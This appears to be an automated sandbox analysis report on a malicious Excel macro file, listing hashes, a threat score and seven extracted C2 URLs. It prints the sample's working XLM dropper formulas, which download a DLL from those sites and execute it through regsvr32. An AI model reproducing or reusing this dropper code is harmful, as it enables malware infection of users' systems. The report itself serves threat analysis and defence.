Overview

overview

10

Static

static

10

be91cd909a...6.xlsm

windows7-x64

10

be91cd909a...6.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    be91cd909abe9af02e09f4d3918f982d3c8a6426479b8661c38fd3ba4ed37c66

  • Size

    29KB

  • Sample

    241120-q8v8eaybjl

  • MD5

    518d59320ac5c5bb379bbe0b32376e1f

  • SHA1

    ca23f8bf8823217d522f6c3c56d66c43b5c2ab80

  • SHA256

    be91cd909abe9af02e09f4d3918f982d3c8a6426479b8661c38fd3ba4ed37c66

  • SHA512

    6a31e152bd82486b063c38373d9c82f4e33ff2ee743874058c59c8c39c0126a70d8639bb998ac89378e5dd657186c90c1c1ba00a4c72e1787a60b3f5c66db6aa

  • SSDEEP

    384:RvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:ZqUtVNZAXby9y+cccS1AsuIjxl

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://iqraacfindia.org/wp-admin/dG/

https://he.adar-and-ido.com/wp-admin/xk7D/

https://www.digigoal.fr/wp-admin/VfU0aIj/

https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/

https://al-brik.com/vb/mMQlbHPCX/

https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/

https://biantarajaya.com/awstats-icon/VR5wDEvBj/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://iqraacfindia.org/wp-admin/dG/","..\whxc.dll",0,0) =IF('IJEGVS'!H16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://he.adar-and-ido.com/wp-admin/xk7D/","..\whxc.dll",0,0)) =IF('IJEGVS'!H18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.digigoal.fr/wp-admin/VfU0aIj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb/mMQlbHPCX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/","..\whxc.dll",0,0)) =IF('IJEGVS'!H26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://biantarajaya.com/awstats-icon/VR5wDEvBj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\whxc.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://iqraacfindia.org/wp-admin/dG/
xlm40.dropper

https://he.adar-and-ido.com/wp-admin/xk7D/
xlm40.dropper

https://www.digigoal.fr/wp-admin/VfU0aIj/
xlm40.dropper

https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/
xlm40.dropper

https://al-brik.com/vb/mMQlbHPCX/
xlm40.dropper

https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/
xlm40.dropper

https://biantarajaya.com/awstats-icon/VR5wDEvBj/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://iqraacfindia.org/wp-admin/dG/
xlm40.dropper

https://he.adar-and-ido.com/wp-admin/xk7D/
xlm40.dropper

https://www.digigoal.fr/wp-admin/VfU0aIj/

Targets

    • Target

      be91cd909abe9af02e09f4d3918f982d3c8a6426479b8661c38fd3ba4ed37c66

    • Size

      29KB

    • MD5

      518d59320ac5c5bb379bbe0b32376e1f

    • SHA1

      ca23f8bf8823217d522f6c3c56d66c43b5c2ab80

    • SHA256

      be91cd909abe9af02e09f4d3918f982d3c8a6426479b8661c38fd3ba4ed37c66

    • SHA512

      6a31e152bd82486b063c38373d9c82f4e33ff2ee743874058c59c8c39c0126a70d8639bb998ac89378e5dd657186c90c1c1ba00a4c72e1787a60b3f5c66db6aa

    • SSDEEP

      384:RvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:ZqUtVNZAXby9y+cccS1AsuIjxl

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks